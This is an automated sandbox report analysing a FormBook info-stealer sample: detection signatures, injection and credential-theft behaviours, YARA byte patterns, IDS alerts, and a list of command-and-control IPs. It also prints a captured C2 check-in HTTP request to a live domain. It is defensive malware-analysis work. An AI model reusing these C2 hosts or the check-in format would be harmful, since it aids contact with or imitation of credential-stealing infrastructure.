Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
H1CYDJ8LQe.exe

Overview

General Information

Sample name:H1CYDJ8LQe.exe
renamed because original name is a hash value
Original sample name:ff969b79ea4daf4a820a4c21a8d1f8e66d25290902e2e9f131a4a88bb8f5def3.exe
Analysis ID:1549376
MD5:8afeae6ec5433e3f0c6903fc107fa851
SHA1:3e0ed7af55e709fa0bb5c744f59bd94a8f8ab2bf
SHA256:ff969b79ea4daf4a820a4c21a8d1f8e66d25290902e2e9f131a4a88bb8f5def3
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • H1CYDJ8LQe.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\H1CYDJ8LQe.exe" MD5: 8AFEAE6EC5433E3F0C6903FC107FA851)
    • svchost.exe (PID: 6016 cmdline: "C:\Users\user\Desktop\H1CYDJ8LQe.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • SwTeWVAxKdsP.exe (PID: 2020 cmdline: "C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dvdplay.exe (PID: 3592 cmdline: "C:\Windows\SysWOW64\dvdplay.exe" MD5: D388610A1DE600E01277AECF3B1280A3)
          • SwTeWVAxKdsP.exe (PID: 2816 cmdline: "C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3140 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c180:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c180:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e703:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x166a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f503:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x174a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", CommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", ParentImage: C:\Users\user\Desktop\H1CYDJ8LQe.exe, ParentProcessId: 7096, ParentProcessName: H1CYDJ8LQe.exe, ProcessCommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", ProcessId: 6016, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", CommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", ParentImage: C:\Users\user\Desktop\H1CYDJ8LQe.exe, ParentProcessId: 7096, ParentProcessName: H1CYDJ8LQe.exe, ProcessCommandLine: "C:\Users\user\Desktop\H1CYDJ8LQe.exe", ProcessId: 6016, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:42:07.835082+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449730TCP
            2024-11-05T15:42:47.759944+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449741TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:42:24.713888+010028554651A Network Trojan was detected192.168.2.4497363.33.130.19080TCP
            2024-11-05T15:42:48.266162+010028554651A Network Trojan was detected192.168.2.4497423.33.130.19080TCP
            2024-11-05T15:43:03.246847+010028554651A Network Trojan was detected192.168.2.449814213.249.67.1080TCP
            2024-11-05T15:43:31.948296+010028554651A Network Trojan was detected192.168.2.4499003.33.130.19080TCP
            2024-11-05T15:43:45.254236+010028554651A Network Trojan was detected192.168.2.4500193.33.130.19080TCP
            2024-11-05T15:43:58.817264+010028554651A Network Trojan was detected192.168.2.450023161.97.142.14480TCP
            2024-11-05T15:44:12.934203+010028554651A Network Trojan was detected192.168.2.4500278.217.17.19280TCP
            2024-11-05T15:44:27.387334+010028554651A Network Trojan was detected192.168.2.45003178.141.202.20480TCP
            2024-11-05T15:44:41.510743+010028554651A Network Trojan was detected192.168.2.450035184.94.215.2680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-05T15:42:40.580377+010028554641A Network Trojan was detected192.168.2.4497373.33.130.19080TCP
            2024-11-05T15:42:44.059393+010028554641A Network Trojan was detected192.168.2.4497383.33.130.19080TCP
            2024-11-05T15:42:46.606255+010028554641A Network Trojan was detected192.168.2.4497393.33.130.19080TCP
            2024-11-05T15:42:54.246835+010028554641A Network Trojan was detected192.168.2.449772213.249.67.1080TCP
            2024-11-05T15:42:57.137402+010028554641A Network Trojan was detected192.168.2.449783213.249.67.1080TCP
            2024-11-05T15:42:59.653067+010028554641A Network Trojan was detected192.168.2.449798213.249.67.1080TCP
            2024-11-05T15:43:09.074514+010028554641A Network Trojan was detected192.168.2.4498543.33.130.19080TCP
            2024-11-05T15:43:12.512491+010028554641A Network Trojan was detected192.168.2.4498703.33.130.19080TCP
            2024-11-05T15:43:15.060401+010028554641A Network Trojan was detected192.168.2.4498843.33.130.19080TCP
            2024-11-05T15:43:38.496790+010028554641A Network Trojan was detected192.168.2.4500163.33.130.19080TCP
            2024-11-05T15:43:40.155976+010028554641A Network Trojan was detected192.168.2.4500173.33.130.19080TCP
            2024-11-05T15:43:42.721431+010028554641A Network Trojan was detected192.168.2.4500183.33.130.19080TCP
            2024-11-05T15:43:51.189788+010028554641A Network Trojan was detected192.168.2.450020161.97.142.14480TCP
            2024-11-05T15:43:53.720367+010028554641A Network Trojan was detected192.168.2.450021161.97.142.14480TCP
            2024-11-05T15:43:56.255680+010028554641A Network Trojan was detected192.168.2.450022161.97.142.14480TCP
            2024-11-05T15:44:05.012335+010028554641A Network Trojan was detected192.168.2.4500248.217.17.19280TCP
            2024-11-05T15:44:07.824897+010028554641A Network Trojan was detected192.168.2.4500258.217.17.19280TCP
            2024-11-05T15:44:10.344137+010028554641A Network Trojan was detected192.168.2.4500268.217.17.19280TCP
            2024-11-05T15:44:19.746712+010028554641A Network Trojan was detected192.168.2.45002878.141.202.20480TCP
            2024-11-05T15:44:22.327458+010028554641A Network Trojan was detected192.168.2.45002978.141.202.20480TCP
            2024-11-05T15:44:24.856082+010028554641A Network Trojan was detected192.168.2.45003078.141.202.20480TCP
            2024-11-05T15:44:33.583073+010028554641A Network Trojan was detected192.168.2.450032184.94.215.2680TCP
            2024-11-05T15:44:36.379438+010028554641A Network Trojan was detected192.168.2.450033184.94.215.2680TCP
            2024-11-05T15:44:38.988721+010028554641A Network Trojan was detected192.168.2.450034184.94.215.2680TCP
            2024-11-05T15:44:48.065467+010028554641A Network Trojan was detected192.168.2.4500363.33.130.19080TCP
            2024-11-05T15:44:50.599779+010028554641A Network Trojan was detected192.168.2.4500373.33.130.19080TCP
            2024-11-05T15:44:53.173155+010028554641A Network Trojan was detected192.168.2.4500383.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: H1CYDJ8LQe.exeReversingLabs: Detection: 39%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: H1CYDJ8LQe.exeJoe Sandbox ML: detected
            Source: H1CYDJ8LQe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: dvdplay.pdbGCTL source: svchost.exe, 00000001.00000002.1862870444.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1862889809.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000002.3526788832.0000000001398000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SwTeWVAxKdsP.exe, 00000002.00000000.1764960932.00000000004BE000.00000002.00000001.01000000.00000004.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3526375024.00000000004BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: H1CYDJ8LQe.exe, 00000000.00000003.1678980011.0000000004710000.00000004.00001000.00020000.00000000.sdmp, H1CYDJ8LQe.exe, 00000000.00000003.1678801980.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750211424.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1748581643.0000000003000000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1866640503.00000000031F8000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1869028004.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.0000000003560000.00000040.00001000.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.00000000036FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: H1CYDJ8LQe.exe, 00000000.00000003.1678980011.0000000004710000.00000004.00001000.00020000.00000000.sdmp, H1CYDJ8LQe.exe, 00000000.00000003.1678801980.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1863300462.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750211424.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1748581643.0000000003000000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, dvdplay.exe, 00000003.00000003.1866640503.00000000031F8000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1869028004.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.0000000003560000.00000040.00001000.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.00000000036FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dvdplay.pdb source: svchost.exe, 00000001.00000002.1862870444.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1862889809.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000002.3526788832.0000000001398000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527827023.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942597721.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2163541700.000000001D2EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527827023.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942597721.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2163541700.000000001D2EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B3C580 FindFirstFileW,FindNextFileW,FindClose,3_2_00B3C580
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 4x nop then xor eax, eax3_2_00B29AF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 4x nop then pop edi3_2_00B426B8
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 4x nop then mov ebx, 00000004h3_2_033B04E7

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49783 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49798 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49870 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49854 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49814 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49900 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50019 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 78.141.202.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 78.141.202.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 78.141.202.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 78.141.202.204:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 184.94.215.26:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 184.94.215.26:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 184.94.215.26:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 184.94.215.26:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 161.97.142.144:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.030002832.xyz
            Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox ViewASN Name: METAREGISTRARNL METAREGISTRARNL
            Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
            Source: Joe Sandbox ViewASN Name: VXCHNGE-NC01US VXCHNGE-NC01US
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49741
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /r1bk/?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc HTTP/1.1Host: www.it2sp8.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
